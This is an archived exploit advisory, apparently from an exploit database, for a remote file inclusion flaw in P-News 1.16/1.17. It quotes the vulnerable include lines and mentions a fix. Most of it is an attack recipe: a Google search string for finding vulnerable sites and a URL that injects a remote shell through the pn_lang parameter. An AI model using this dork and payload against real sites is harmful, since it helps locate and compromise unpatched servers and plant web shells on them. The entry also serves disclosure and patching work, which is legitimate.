id: 1011
date: 10/15/2006
title: P-News <= 1.16 Remote File Include Vulnerability
author: vegas78
cves: 

================================================
P-News <= 1.16 Remote File Include Vulnerability
================================================



============================================
P-News 1.16, 1.17 Remote File Inclusion Vulnerability
============================================

Discovered by vegas78 - feel82[at]web.de
============================================
Greetz: scoper, corny, smaesch0r, Sascha Schmalz, 
        ReFleCtion, BleX, |pupi (?),   
============================================

include("$pn_lang/functions.php"); // bad code
include("$pn_lang/language.php"); // bad code
...

fix:
make absolute path declaration or update to the new 2.* version

// Google string
allintitle:"P-news ver. 1.16" / allinurl:p-news.php

================================================================

http://site/p-news.php?pn_lang=[shell]

================================================================



#  0day.today [2023-03-23]  #